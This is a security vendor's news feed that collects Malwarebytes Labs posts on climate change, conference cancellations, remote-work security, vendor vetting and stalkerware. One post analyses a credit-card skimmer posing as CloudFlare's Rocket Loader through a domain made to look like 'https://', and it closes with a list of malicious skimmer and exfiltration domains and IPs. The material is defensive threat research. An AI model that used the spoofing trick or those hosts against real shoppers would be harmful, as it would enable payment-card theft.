Techie Feeds

The effects of climate change on cybersecurity

Malwarebytes - Fri, 03/13/2020 - 18:55

Outside the coronavirus pandemic and its related healthcare and economic fallout, climate change and cybersecurity are seen by many as the two most urgent problems facing our planet now and in the near future. They are two distinct and separate problems, to be sure. There are some areas, however, where security and climate change overlap, interlock, and influence one another. Let’s have a look.

To understand how climate change and the methods to counteract its rapid ascent will affect cybersecurity, we first have to look at how computing contributes to global warming. Your first instinct about their relationship is probably right: computing involves energy consumption and heat production. As long as we cannot produce enough “clean energy” to satisfy our needs for electricity, the energy consumed by computing—and security within it—will continue to contribute to global warming.

The big energy consumers

There are a few fields in computing and cybersecurity that guzzle up huge amounts of energy and produce heat as a byproduct:

  • Supercomputers
  • Blockchain mining
  • Data centers
  • The Internet as a whole

Before you dismiss the problem of the supercomputers (because you assume there are only a few of them)—even I was astounded to find out that there are over 500 systems that deliver a petaflop or more on the High Performance Linpack (HPL) benchmark. Most of these supercomputers consume vast amounts of electrical power and produce so much heat that large cooling facilities must be constructed to ensure proper performance. But in recent years, vendors have started to produce supercomputers that are more energy efficient.

In 2019, the mining of Bitcoin alone consumed more energy than the entire nation of Switzerland, which equals about one quarter percent of the world’s entire energy consumption. There are many more blockchains and cryptocurrencies, although Bitcoin is by far the largest energy consumer among them. This is mostly due to their operation on the proof-of-work concept and the high value of Bitcoin.

While cybercrime experienced a huge jolt in cryptomining in 2018, the frenzy has mostly died down as Bitcoin value dipped and plateaued. However, cryptomining continues as both a legitimate and illegitimate activity—especially because miners can switch to other cryptocurrencies when Bitcoin drops off.

An even bigger impact on energy consumption are data centers, which already use over 2 percent of the world’s total energy consumption, and that number is expected to rise fast. The prediction is based on the growing number of content delivery networks (CDN), more Internet of Things (IoT) devices, the growth of the cloud, and other colocation services. So, not only do computer centers consume massive amounts of energy, their use is expected to grow astronomically.

The Internet can’t be completely separated from the data centers that enable it. But despite the overlap, it’s still worth mentioning that the total energy consumption of the Internet as a whole lies at around 10 percent, which is more than the world’s total energy production from renewable sources such as wind and solar.

However, it’s fair to note that the Internet has taken over a lot of tasks that would have cost more energy or created a greater carbon footprint if they had been performed in the “old ways.” Consider, for example, the energy saved by working remote: the energy expended on the Internet and inside one’s home is far less damaging than the carbon monoxide released into the atmosphere by fossil fuels from a daily commute to the office.

Global warming’s trickle down effects

Conversely, global warming and its effects on the climate, environment, and economy do have a direct impact on our everyday lives, and that trickles down to cybersecurity. Some of the projected dangers include:

  • Flooding of certain areas
  • Prolongation of the wild-fire season
  • Spread of diseases
  • Economic costs
  • Scarcity of fresh water in certain areas

By 2030, climate change costs are projected to cost the global economy $700 billion annually, according to the Climate Vulnerability Monitor. And The International Organization for Migration estimates that 200 million people could be forced to leave their homes due to environmental changes by 2050.

Climate change and its implications will act as a destabilizing factor on society. When livelihoods are in danger, this will spark insecurity and drive resource competition. This does not only have implications for physical security, but in modern society, this also has an impact on cybersecurity and its associated threats.

From a big picture, worst-case-scenario perspective, climate change could trigger profound international conflicts, which go hand-in-hand with cyberwar. Beyond nation-state activity, individuals that have no other means of providing for their families could turn to cybercrime, which is often seen as a low-risk activity with a potentially high yield.

But on a smaller scale, we’re already seeing the impacts of climate change on cybersecurity, whether via social engineering scare tactics embraced by threat actors or disruptions to Internet-connected home heating and cooling devices meant to track energy consumption.

Global warming scams

NO, we’re not saying that climate change is a hoax or a scam. But we want to issue a warning related to the subject. As with any newsworthy topic, there are and will be scammers trying to make a profit using the feeling of urgency that gets invoked by matters like climate change.

For example, the Intergovernmental Panel on Climate Change (IPCC) issued a warning against several scams abusing their name.

“IPCC has been made aware of various correspondences, being circulated via e-mail, from Internet Web sites, and via regular mail or facsimile, falsely stating that they are issued by, or in association with, IPCC and/or its officials. These scams, which may seek to obtain money and/or in many cases personal details from the recipients of such correspondence, are fraudulent.”

Natural disaster scams are increasing in the same frequency as natural disasters themselves, often claiming to be collecting donations for a particular cause but putting money in their own pockets instead. We’ve seen social engineering tricks ranging from phishing emails and malspam to social media misinformation campaigns on hurricanes, tornadoes, fires, and flooding. Expect this sort of gross capitalization on tragedy and fear to continue as the effects of climate change become more dramatic.

Improving efficiency and preparing for changes

The number of datacenters is down, but their size has grown to meet the demand. This is potentially a step in the right direction since it decreases the power needed for the overhead, but not as big as the step that could be made if they would actually work on their power efficiency.

Online companies typically run their facilities at maximum capacity around the clock, regardless of the demand. As a result, data centers are wasting 90 percent or more of their power. Smart management could make a substantial difference in energy consumption and costs.

Cryptomining could improve on energy consumption if the most popular currencies would not be based on proof of work but proof of stake. Proof of work rewards the largest number of CPU cycles with that the highest energy consumption.

NEO and Hyperledger are next generation blockchain technologies with much lower electricity cost. NEO uses what it calls delegated Byzantine Fault Tolerance (dBFT), which is an optimized proof-of-stake model. Hyperledger Fabric centralizes block creation into a single resource pool and has multiple validators in the participants. It’s an enterprise collaboration engine, using blockchain smart contracts, where validation is much easier than creation, and creation will be centralized on a single, optimized platform.

More effective methods of cooling would both help supercomputers and large data centers. At the moment, we are (ironically) using electricity to power cooling systems to control the heat caused by electricity usage. In fact, cooling gobbles up about 35 percent of the total power in high performance computing with air cooled systems. Hot-water liquid cooling might be a key technology in future green supercomputers as it maximizes cooling efficiency and energy reuse.

Interaction between climate change and cybersecurity

As we have seen, there are opportunities for those in security and computing to slow the progression of climate change. But there are also opportunities for those in cybercrime to take advantage of the destabilization caused by climate change, as some already have through related scams and malware campaigns. As long as we don’t drop security in attempts to counteract global warming, we’ll be able to protect against some of the more advanced threats coming down the pike. But while we still can, let’s rein in our carbon footprint, improve on computing efficiency, and remember our cybersecurity lessons when criminals come calling.

Stay safe, everyone!

The post The effects of climate change on cybersecurity appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Coronavirus impacts security conferences and events: check your schedule

Malwarebytes - Thu, 03/12/2020 - 18:02

With coronavirus starting to take hold globally, international travel restrictions are kicking in and more workplaces are advising to work from home whenever possible. When self-isolation is a potential solution, public gatherings are increasingly looking like a terrible idea. Events are becoming a bit of a hotspot for cases, leading to inevitably bizarre scenarios where coronavirus conferences are cancelled due to coronavirus.

Many major security conferences are already reassessing whether going ahead is worth it. Indeed, some cases of coronavirus have already been confirmed at RSA—one of the biggest security events on the planet. Given the number of attendees and the nature of their jobs (government and private security officials), that alone could have repercussions galore.

Some security events have decided to cancel outright, while others are going with the “temporarily postpone and see what happens at a later date” approach. While it’s tempting to suggest “just going virtual” as some are doing, that’s not always easily achieved.

Cancel, postpone, or virtual

Here’s a short rundown of some problems faced by event organisers in the wake of the current pandemic:

1) Putting on an event costs a lot of money. The venue, advertising, food, setup, safety, insurance, transportation to and from the event for organisers—it all adds up. People pay a ton of cash in advance to secure the event location, and not every venue operator is willing to hand $100,000 back if an event organiser phones up and says, “Actually, about that global pandemic…”

2) Lots of smaller conferences rely on sponsors. If sponsors suddenly bail without considering the impact of vanishing, the event could easily go under, and it won’t get a second attempt the following year. In turn, this (combined with the difficulty in recovering venue fees) could force some events into going ahead or facing financial ruin. It’s in everyone’s best interest to work together as much as possible in those situations, and see if there’s a possibility of going virtual.

3) I’ve helped with a few online events in the past—only small ones—and it was difficult. You can’t just throw up a website and yell “job done!” Streaming can be expensive. Locking down the site and figuring out how to only give content to paying virtual attendees isn’t straightforward. Which time zone are you aiming for when the event happens, and do you even need to stream?

It’s all online anyway, so would it be better to simply record everything and lock it behind a portal somewhere? What software will you use? Does your license accommodate your plans? Can you afford an upgrade if it doesn’t? Will the tech go wrong during the event, and what sort of contingency plans are in place if it does? These are just some of the questions waiting in store for intrepid event folks.

Taking stock of the situation

It’s difficult enough running a virtual event from scratch. I can’t imagine the stress of finding out you suddenly have to switch everything to online or shut everything down at short notice.

While it may end up costing less than a physical event, it may well cause more headaches than planning for the real world, where there’s a fairly solid set of event planning criteria/expectations.

With this in mind, and with a growing collection of security events going into lockdown, we thought it’d be good to pass you a few handy lists that explain what’s going on in security conference land for the foreseeable future. 

The current state of play

In a nutshell, the current state of play is “bad.” Wild West Hackin’ Fest is one such example of an event having to cancel and losing a lot of money in doing so to keep people safe from harm. They’ve decided to go virtual, just like Kernelcon who announced their decision today to do the same thing. Good luck to them both.

Meanwhile, the first major roundup of affected events over on ZDNet grew from nine to 22 in just two days. As per the list itself, some notable changes to your potential event schedule:

  • Black Hat Asia and DEF CON China are both postponed
  • Notable BSides events, including Budapest and Vancouver, are postponed, though Charm (Baltimore) is giving the option to go virtual alongside real-world presenting
  • Kaspersky’s incredibly popular Security Analyst Summit is also postponed
  • Infosecurity Belgium, a huge trade event, has been postponed

Those are just some of the big shakeups heading the infosec industry’s way. That list is constantly being updated, as is the comprehensive listing by region over on Infosecurity Conferences.

More disruption is likely

Regardless of which list you use to keep yourself informed, there will absolutely be more events affected in days to come. Your workplace may already have implemented no-travel policies, but even if you’re going it alone, you may wish to give some events a pass this time around.

Of course, that advice isn’t exactly good news for people who make their living from organising these events or even speaking at them. Whatever your involvement in security conferences, it’s going to be a rough old time of it for the foreseeable future. Stay safe and be well.

The post Coronavirus impacts security conferences and events: check your schedule appeared first on Malwarebytes Labs.

Categories: Techie Feeds

RemoteSec: achieving on-prem security levels with cloud-based remote teams

Malwarebytes - Thu, 03/12/2020 - 16:53

The world of work is changing—by the minute, it feels these days. With the onset of the global coronavirus pandemic, organizations around the world are scrambling to prepare their workforce, and their infrastructure, for a landslide of remote connections. This means that the security perimeter of businesses small and large has transformed practically overnight, requiring IT leaders to rethink the way they’re protecting their organizations. 

Even before the spread of the virus, preparing business security protocols for a mixture of remote and on-premises work had become a forgone conclusion. With increasing globalization and connectedness, remote work is fast supplementing, if not outright replacing, traditional 9-5 office-based hours. Upwork Global predicts that by 2028, up to 78 percent of all departments will have remote workers. 

This trend is affecting companies of all sizes. In fact, a study by Owl Labs indicates that smaller companies are twice as likely to hire full-time remote workers, and a State of Telecommuting study found that telecommuting grew by 115 percent over the last decade. 

These numbers clearly show that remote work is here to stay, whether in quick response to dire crises or simply as a slow, societal shift. What companies are now grappling with is how to manage a ballooning remote workforce, and more so, the security challenges that come with that growth. 

In the past, traditional work made it easy to create and enforce on-prem security policies. Simple controls like logical and physical access were handled through a centralized command and control hierarchy. As workforces become increasingly distributed, such security hierarchies are starting to underdeliver. Companies are now faced with novel security challenges posed by the diverse work conditions remote workers operate within. 

The rise of RemoteSec

Remote Security, or RemoteSec, is a set of security tools, policies, and protocols that govern the IT infrastructure supporting remote teams. As most remote workers rely heavily on cloud tools and platforms, RemoteSec addresses security challenges that almost always fall under this category, though other tools, such as virtual private networks (VPNs) play a role, as they are often deployed to establish secure connections to the cloud. 

For any business working with remote teams, understanding the role cloud security plays in securing remote teams is crucial to realizing overall remote security. However, one challenge that remains is how to replicate the success of on-prem security within a cloud environment. 

Before we delve into the details of RemoteSec, it’s crucial to note the difference between RemoteSec and overall cybersecurity policy. While both deal with securing networked resources, RemoteSec focuses mostly on securing remote teams and the cloud resources they use. As such, organizations with cybersecurity policies may need to extend them to cover security issues that emerge when remote workers relying on cloud infrastructure are added to the workforce matrix. 

Crucial RemoteSec considerations

Remote workers—which include freelancers, contractors, or in-house employees working from home, in coworking spaces, or at coffee shops—do their jobs under a diverse set of conditions. These unique and unpredictable conditions form the body of challenges RemoteSec addresses. 

For example, 46 percent of staff members admit to moving files between work and personal computers while working from home. A further 13 percent admit to sending work emails via personal email addresses because they are unable to connect to an office network. 

With these challenges in mind, here are some crucial RemoteSec considerations you should focus on to secure your remote teams. 

Global location of employees

Remote workers that are spread across the globe face different security challenges. As each part of the world has its own unique IT infrastructure characteristics, it is essential to standardize remote work environments for your entire team. Using VPNs and virtual desktops can help provide a uniform and secure work environment for your remote team, despite their location in the world. 

Remote data security policies

Data security is a significant challenge when working with remote teams. For example, remote workers may access public unsecured Wi-Fi hotspots, exposing company data to eavesdroppers or cybercriminals. Also, remote workers may use free data storage tools like Google Drive without knowing that such tools are vulnerable to ransomware attacks.

RemoteSec addresses these issues through comprehensive cloud data policies that cover remote data access, public hotspots, USB devices, password management, device management, network compliance, and others. 

IT and network infrastructure

Endpoint security is another area that organizations must address when it comes to RemoteSec. Remote workers tend to use multiple endpoints (devices) to access company resources. However, in many instances, these devices may not be secure or may be connecting through unsecured network channels.

Issuing mobile device management (MDM) policies, using secure VPNs, deploying cloud-based endpoint security on all remote devices, and enforcing secure cloud network protocols can ensure remote workers do not circumvent network or endpoint security measures. 

Remote IT support

Not all remote workers are tech-savvy. As more roles move to remote, non-technical remote workers may face challenges accessing IT support. If a remote worker halfway across the world experiences technical problems, they may turn to non-secure, outside IT support, exposing your company’s confidential resources. Using cloud tools to deliver IT support can help maintain seamless security across your technical and non-technical remote workforce. 

On-prem security tools vs. cloud-based RemoteSec 

Most companies extol the virtues of on-prem security and rightly so. On-prem security is the gold standard of information security. However, that standard falls apart when stood up against today’s hybrid workforce of remote teams and in-house professionals using a diverse range of endpoints—especially when that workforce is quickly ushered back into their homes for safety purposes. Why? Because on-prem security protocols are designed to contain information in an airtight box. 

Cloud and remote teams not only open that box, but they also turn the organization into an open platform with multiple access points and endpoints. So, how can an organization achieve on-prem security levels with remote teams in the cloud? The answer lies in using the right security tools to migrate your organization from an on-prem mindset to one that considers remote security equally. 

Cloud security tools include desktop infrastructure, file system snapshots, remote data and activity monitoring, and remote device encryption and data wipes. Such mechanisms not only safeguard company data, but give more control over IT resources used by remote workers.

In addition, deploying a single-sign on service with multi-factor authentication can better protect company data stored in the cloud, as well as assist in access management. VPNs, both desktop and mobile, can further provide authentication while also encrypting network traffic and obscuring private details, which may be necessary while connecting in public places.

A massive shift

Cloud services, at once the hero and villain of information security, will prove to be an ace up the sleeve for companies transitioning away from underperforming on-prem security standards. While remote work seems to have caught on—and is sometimes necessary—we are only at the beginning of a massive tectonic shift in how work is done. 

RemoteSec, therefore, is an emerging security field in security, one that’s been discussed for years but never quite tested to this degree. As organizations gain more remote workers, the need to embrace RemoteSec at the forefront of cybersecurity policy will only escalate. Addressing the crucial areas outlined above can help organizations mitigate the emerging risks while embracing a remote workforce. 

The post RemoteSec: achieving on-prem security levels with cloud-based remote teams appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Securing the MSP: best practices for vetting cybersecurity vendors

Malwarebytes - Wed, 03/11/2020 - 15:44

Ironically, to keep costs low for their enterprise and mid-market clients, managed service providers (MSPs) are some of the most reliant on third-party vendors—including those providing security. While this is generally not an indication of dysfunction or vulnerability, the responsible MSP will be looking with a critical eye while vetting cybersecurity vendors to evaluate how they might increase the organization’s attack surface—especially with the uptick in targeted attacks over the last few months.

So how should an MSP—or any organization, for that matter—evaluate cybersecurity vendors not just for budget and effectiveness, but also security posture? And how can MSPs continue to monitor their security partners as product features and organizational needs change over time?

What’s concerning from a Chief Security Officer’s (CSO’s) perspective is the veneer of legitimacy many cybersecurity vendors are capable of producing: Scammy security companies generally have slick, professional websites, convincing sales engineers, legions of onshore support administrators, and almost invariably, one or more executives with ties to a government intelligence agency, whether in the US or abroad.

Given that almost all cybersecurity companies on the market strive to project an image of professionalism, how can a CSO sort out companies that are a value add from those with a less than legitimate business model? And what about the companies that are above board, but just not very good? Let’s take a look.

The ugly cybersecurity vendors

Most harmful to a business in the long run are the cybersecurity vendors who either don’t do much, or have a business model that skirts the edge of the law. The simplest and most cost effective way of avoiding these companies is conducting a community temperature check.

Bad vendors tend to acquire a collective disapproval in the infosec community long before their business model fails. A quick Twitter or Google search of the vendor name can often reveal detailed accounts by analysts who have used them and can provide candid assessments.

But the gold standard for a temperature check is to ask your own team. Cross-pollination of infosec personnel is at an all time high. As such, your team most likely has a broad range of experience with multiple vendors on a host of platforms.

Your team can provide invaluable data, like added operations costs over the long term, company billing practices, and interoperability with existing systems. They can also tip you off on issues with vaporware; generally defined as giving the appearance of having a product/feature, which is in reality much more limited or even non-existent.

Like most vendors of higher quality, the ugly will also have former intelligence agency personnel to give themselves a veneer of authority and competence. A question that rarely gets asked, though, is “Which agency?” Is it an agency with a formal mandate for addressing cyberthreats, with an established university pipeline and well-regarded reputation? Is it an agency whose cyber division was stood up relatively recently, with repurposed employees from other departments?

Further, how relevant is that experience to your business needs? If the majority of your security losses are coming from phishing and malvertising, is having access to analysts experienced in state-sponsored intrusions really relevant?

The bad cybersecurity vendors

Some infosec vendors really do try their best to provide a valuable product to the end user, but still fall awfully short of the mark. The problem here isn’t that they’re not trying to deliver a good product—it’s that they don’t necessarily understand what “good” is to you.

In the public sector, intelligence is often defined as information that is timely, accurate, and relevant. This applies to cyberthreat intelligence derived from security products as well. If you kick out any one of the legs on the threat intelligence tripod, you’re left with a platform too unstable to make any reliable judgement on cyber risk.

An organizational threat delivered to SOC personnel in a timely manner that hasn’t been vetted (i.e. is inaccurate) is not intelligence. Threat data that is timely and accurate, but not adapted to your business vertical (i.e is irrelevant) is also not intelligence.

What these threat alerts amount to tends to be a drag on organizational resources, as in-house security personnel are tasked with vetting ever-increasing quantities of data that don’t address business needs. Don’t those tier-two SOC techs have better things to do than retrace vague, un-targeted analysis?

Bad cyberthreat intel vendors often correctly identify the desired end goal of intelligence, but lack an understanding of appropriate methodology. Again, these companies often out themselves as undesirable with a quick community check.

A poorly-sourced, unreviewed report using inflated claims will quickly reveal itself as such when the infosec community reviews the content. Timely, accurate, and relevant threat data will be shared, retweeted, and commented upon much more frequently then less useful sources. Pausing for a moment to see how other organizations have integrated threat data being offered to you can provide a valuable check against letting a bad vendor slip through the cracks.

Some questions to ask the sales engineer:

  • How will this data be tailored to my organization?
  • How is the data delivered to us, and if it’s a portal, what is your upgrade release schedule?
  •  And most importantly: How do you vet your sources?

Note: do not accept “We have to protect our sources and methods.” This is a phrase borrowed from government intelligence, who generally uses it in situations involving threats to human lives. More commonly, it’s used to express sentiments akin to “I’m not going to tell you because I don’t want to, don’t know, or it would embarrass me.”

The good cybersecurity vendors

Here’s the most difficult category and the holy grail for augmenting your security team: a company that delivers well-targeted services to your organization in a manner that is timely, accurate, and relevant. The catch here is that to properly spot the good company, your own organization has to have timely, accurate, and relevant defined down to a T. This brings us to the last and most important aspect of vetting: metrics.

Certain companies can provide an awfully impressive “real-time demonstration” of the product, sometimes offering you a head-to-head with competing products. They might reference the number of threats detected, speed of detections, analysis, or number of endpoints providing data.

There is a barrage of cybersecurity metrics available to benchmark performance, so how do you know which are valuable? The answer is: none of them. The only metric relevant to evaluate security performance is that which has been generated by your own team against a mature risk tolerance posture. Vendor metrics can’t possibly address the various risk tolerances of all their customers and therefore can’t be relevant to how they would perform for you. Once you know your own metrics, evaluating vendors can be a piece of cake. (And requires much fewer meetings.)

Some questions to ask the relationship manager for a great vendor:

  • How can I share feedback from my security team?
  • When can we revisit my business needs?
  • What improvements do you have planned for next quarter?

To sum up, vetting vendors doesn’t have to be painful—as long as you know your own risk tolerance posture, and have a mature communication channel with your own security team.

The post Securing the MSP: best practices for vetting cybersecurity vendors appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Rocket Loader skimmer impersonates CloudFlare library in clever scheme

Malwarebytes - Tue, 03/10/2020 - 15:46

Update: The digital certificate issued for https[.]ps has been revoked by GlobalSign.

Fraudsters are known for using social engineering tricks to dupe their victims, often times by impersonating authority figures to instill trust.

In a recent blog post, we noted how criminals behind Magecart skimmers mimicked content delivery networks in order to hide their payload. This time, we are looking at a far more clever scheme.

This latest skimmer is disguised as a JavaScript file that appears to be CloudFlare’s Rocket Loader, a library used to improve page load time. The attackers created an almost authentic replica by registering a specially crafted domain name.

This campaign has been affecting a number of e-commerce sites and shows threat actors will continue to come up with ingenious ways to deceive security analysts and website administrators alike.

Decoy Rocket Loader

On a compromised Magento site, we noticed that attackers had injected a script purporting to be the Rocket Loader library. In fact, we can see two almost identical versions loaded side by side.

If we look at their source code, we find that the two scripts are quite different. One of them is obfuscated, while the other is recognizable as the legitimate CloudFlare Rocket Loader library.

There is a subtle difference in the URI path loading both scripts. The malicious one uses a clever way to turn the domain name http.ps (note the dot ‘.’ , extra ‘p’ and double slash ‘//’) into something that looks like ‘https://’. The threat actors are taking advantage of the fact that since Google Chrome version 76, the “https” scheme (and special-case subdomain “www”) is no longer shown to users.

To reveal the full URL with its protocol, you can double click inside the address bar. In other browsers such as Firefox or Edge, the default is to show the entire URL. That makes this attack a little more obvious and therefore less effective if you were a site administrator investigating this library.

Active skimmer campaign

The Palestinian National Internet Naming Authority (PNINA) is the official domain registry for the .ps country code Top-Level-Domain (ccTLD). The decoy domain http.ps was registered on 2020-02-07 via the Key-Systems GmbH registrar.

In mid-February, security researcher Willem de Groot tweeted about how this domain was being used for credit card skimming in an ongoing campaign with the additional “e4[.]ms” domain.

The skimmer code as well as its exfiltration gate (autocapital[.]pw), were described by Denis Sinegubko, a security researcher at GoDaddy/Sucuri.

There are two ways e-commerce sites are being compromised:

  • Skimming code that is injected into a self hosted JavaScript library (the jQuery library seems to be the most targeted)
  • A script that references an external JavaScript, hosted on a malicious site

The first version of the skimmer used in this campaign is the hex obfuscated type with data exfiltration via autocapital[.]pw as seen in the decoy Rocket Loader library. As Denis mentioned in his tweet, this skimmer contains an English and Portuguese version (urlscan.io archive here).

The other version of the skimmer (hosted on e4[.]ms) uses a different obfuscation scheme with data exfiltration via xxx-club[.]pw (this domain is on the same server as the autocapital[.]pw exfiltration gate).

We recognize this obfuscation pattern as ‘Radix’, from a previous campaign described and tracked by Sucuri since 2016. Given the naming convention used for the domains and skimmers, we believe the same threat actors may be behind this newest wave of attacks.

Patching and proactive security

This kind of attack reinforces the importance of good website security. The majority of compromises happen on sites that have not been updated or that use weak login credentials. These days, other forms of defense include web application firewalls and general hardening of the CMS and its server.

The majority of consumers that shop on a compromised site will have no idea that something went wrong until it’s too late. Even though it is the responsibility of the merchant to ensure their platform is secure, it is obvious that additional containment needs to be taken by visitors themselves.

Malwarebytes users are protected against this credit card skimming attack via our web protection layer in Malwarebytes for consumers and businesses.

We have reached out to the registrar and certificate authority but at the time of writing the malicious decoy domain is still active.

Indicators of compromise

Skimmers and gates

http[.]ps autocapital[.]pw xxx-club[.]pw e4[.]ms y5[.]ms 83.166.248[.]67
83.166.244[.]189

The post Rocket Loader skimmer impersonates CloudFlare library in clever scheme appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (March 2 – 8)

Malwarebytes - Mon, 03/09/2020 - 20:07

Last week on Malwarebytes Labs, we fired up part 1 of our series on child identity theft, asked how well law enforcement can deal with cybercriminals, and took a trip down the memory lane of moral panic. We also looked at the positives and negatives of VPNs and examined our own progress in the fight against stalkerware, spyware, and monitoring apps.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (March 2 – 8) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

International Women’s Day: awareness of stalkerware, monitoring, and spyware apps on the rise

Malwarebytes - Mon, 03/09/2020 - 15:00

Nine months ago, Malwarbytes recommitted itself to detecting invasive monitoring apps that can lead to the excessive harm of women—most commonly known as stalkerware. We pledged to raise public awareness, reach out to advocacy groups, and share samples and intelligence with other security vendors.

Now, for International Women’s Day (March 8), we decided to take measure of our efforts, examining the effects of our campaign and outreach, as well as the formation of the Coalition Against Stalkerware, of which we were a founding member. Have we actually made a difference?

As a refresher, or for those that haven’t been following along: Stalkerware and other monitoring apps can allow a user to look through someone else’s text messages, record their phone calls, turn on their phone’s cameras and microphones, rifle through their private files, peer into their search history, and track their GPS location—all without consent.

We know that stalkerware, monitoring apps, and others with spyware-like capabilities present clear potential for privacy violations. However, these apps and other Internet of Things (IoT) devices, such as smart thermostats, doorbells, and locks, have been tied to multiple cases of physical stalking, cyberstalking, and domestic violence. In fact, according to the National Domestic Violence Hotline, victims of digital abuse and harassment are two times as likely to be physically abused, two-and-a-half times as likely to be psychologically abused, and five times as likely to be sexually coerced.

While many stalkerware apps market or classify themselves as parental monitoring apps, their technical capabilities are essentially the same—sometimes on par with the level of surveillance perpetrated by nation-state actors. Worse, when put into the hands of domestic abusers, they can totally dismantle a survivor’s life, revealing their location if they’re trying to escape or uncovering their private messages if they’re attempting to discuss a safety plan.

Yet, for all its potential for emotional and physical harm, stalkerware has often been swept under the rug by many in the cybersecurity community. Most antivirus companies do not detect monitoring apps; or if they do, they use weak language indicating the threat is not as severe as malware.

That’s what caused Electric Frontier Foundation Director of Cybersecurity Eva Galperin to start calling out antivirus companies in April 2019 for better protection. And that’s why we stood up with her—to double down on what we started more than five years ago with our own stalkerware detection efforts.

Let’s take a look at how we’re doing so far. These are the numbers on stalkerware.

Stalkerware public awareness

While we have written about monitoring apps’ potential to be used for domestic abuse since 2014 (and detected those apps in our Malwarebytes for Android program), we first aimed to raise public awareness of stalkerware by publishing more than 10 articles on the topic since June 2019, including how to protect against stalkerware, what domestic abuse survivors should do if they find stalkerware on their phone, and the difficulties of pursuing legal action for stalkerware victims.

In total, our articles have been read nearly 65,000 times. The terms “stalkerware,” “stalkerware app” and “stalkerware Android” have gained a bit of momentum in Google search over the last year, showing signs of life in June 2019, the month we published our first article of the campaign. A small spike in July also coincides with our own coverage, as well as Google Play pulling seven stalkerware apps from its store. The biggest bump in overall awareness was in late October and early November 2019, when National Cyber Security and National Domestic Violence Awareness months coincided with the FTC bringing its first stalkerware case, fining app developers for violations.

Global interest in “stalkerware” search term over 12 months, with the number 100 representing highest interest level The search term “stalkerware app” has been gaining steam since October 2019, seeing its heaviest spike after a concerted effort to raise awareness by the Coalition around the RSA Conference in late February 2020. Mobile monitor and spyware categories: global detections of stalkerware

Despite the popular “stalkerware” label, Malwarebytes does not use the term to classify app detections within our product, as murky marketing techniques can often make distinguishing between stalkerware, workplace, or parental monitoring apps difficult. Instead, we look at the technical capabilities of the software and detect stalkerware apps as either belonging to the monitor category or spyware.

From March 1, 2019 to March 1, 2020, Malwarebytes detected monitor apps 55,038 times on Malwarebytes for Android user devices. During the same time period the year before, monitor apps were detected 44,116 times. That’s an increase of more than 10,000 detections in a single year. 

We must be clear: The rise in monitor detections does not automatically guarantee a rise in the use of these apps. Because Malwarebytes improved its capabilities to find monitoring apps, our detection volume did increase. We bolstered our data set independently, but also worked with other cybersecurity vendors in the Coalition Against Stalkerware to improve our results.

However, a February 2020 survey by Norton LifeLock on “online creeping” found that 49 percent of respondents admitted to “stalking” their partner or ex online without their knowledge or consent—a number that suggests a general acceptance of online stalking behavior today. Does that mean there are more developers and users of monitoring apps than there were before? We would need to conduct a meta-study and include more data points than our own telemetry to determine that truth. What we do know is that today, Malwarebytes detects 2,745 variants of monitor apps, an increase of nearly 1,000 from the year before.

Interestingly, from March 1, 2019 to March 1, 2020, Malwarebytes for Android registered 1,378 spyware detections on user devices. In the previous year, however, Malwarebytes detected spyware 2,388 times for users in the same group. In fact, although we now detect 318 variants of spyware apps for Android devices—an increase of almost 40 from the year before—our detections still decreased year over year.

The decrease in spyware detections perhaps points to something different—a decision to shy away from making and utilizing these tools. Whereas stalkerware-type apps have seen little enforcement, either from the government or from individuals and companies, spyware apps have received deeper scrutiny. Just this week, WhatsApp moved forward with its lawsuit against one major spyware developer

In looking at our data, we also discovered these threats in nearly every part of the world. Malwarebytes detected monitoring APKs in the US, India, Indonesia, the United Kingdom, Brazil, Ireland, France, Russia, Mexico, Italy, Canada, Germany, Bangladesh, Australia, and the United Arab Emirates. The US represented the largest share of detections, but admittedly, it also represents the largest share of our user base.

While our telemetry shows that monitoring apps continue to plague users everywhere, the data does not show the broader relationship between these types of apps and stalking, cyberstalking, and domestic violence.

Monitoring apps and domestic violence

According to Danielle Citron, professor of law at Boston University School of Law, monitoring apps, or what she calls “cyber stalking” apps, have been tied to multiple cases of domestic violence and abuse. As she wrote in her 2015 paper “Spying Inc.

“A woman fled her abuser who was living in Kansas. Because her abuser had installed a cyber stalking app on her phone, her abuser knew that she had moved to Elgin, Illinois. He tracked her to a shelter and then a friend’s home where he assaulted her and tried to strangle her. In another case, a woman tried to escape her abusive husband, but because he had installed a stalking app on her phone, he was able to track down her and her children. The man murdered his two children. In 2013, a California man, using a spyware app, tracked a woman to her friend’s house and assaulted her.”

Further, according to the NortonLifeLock survey, the use of stalkerware-type apps is just one of several behaviors that Americans engage in to check in on their ex and current romantic partners online.

The Online Creeping Survey, which included responses from more than 2,000 adults in the US, showed that 1 in 10 Americans admitted to using stalkerware-type apps against their ex or current romantic partners. The survey also found that 21 percent of respondents looked through a partner’s device search history without permission, and 9 percent said they created a fake social media profile to check in on an ex or current partner.

Kevin Roundy, technical director for NortonLifeLock, warned about these behaviors.

“Some of the behaviors identified in the NortonLifeLock Online Creeping Survey may seem harmless, but there are serious implications when this becomes a pattern of behavior and escalates, or when stalkerware and creepware apps get in the hands of an abusive ex or partner,” Roundy said.

As Malwarebytes reported last year, some of these behaviors are closely associated with the crimes of stalking and cyberstalking in the United States. Use of monitoring or spyware apps can create conditions in which domestic abusers can follow their partners’ GPS locations and allow them to look at their private conversations through texts and emails. For domestic abuse survivors trying to escape a dangerous situation, stalkerware can place them at an even greater risk.

Unfortunately, much of the behavior related to stalking and cyberstalking disproportionately harms women.

According to a national report of about 13,000 interviews conducted by the Centers for Disease Control and Prevention (CDC), an estimated 15.2 percent of women and an estimated 5.7 percent of men have been stalked in their lifetime.

Similar data from the Bureau of Justice Statistics showed nearly the same discrepancy. In a six-month period, of more than 65,000 Americans interviewed, 2.2 percent of women reported they had been stalked, while 0.8 percent of men reported the same. 

While stalking victims include both men and women, the data from both studies shows that women are stalked roughly 270 percent more often than men.

What else can we do?

The stalkerware problem is tangled and complex. Makers of these types of apps often skirt government enforcement actions—with only two developers receiving federal consequences in the past six years. Users of these apps can vary from individuals who consent to being tracked to domestic abusers who never seek consent.

And the way in which these apps can be used can violate both Federal and state laws, yet, when the apps are used in conjunction with stalking and cyberstalking, the victims of these crimes often shy away from engaging with law enforcement to find help. Even if victims do work with police, they often have one priority—stopping the harm, not filing prolonged lawsuits against their stalkers or abusers.

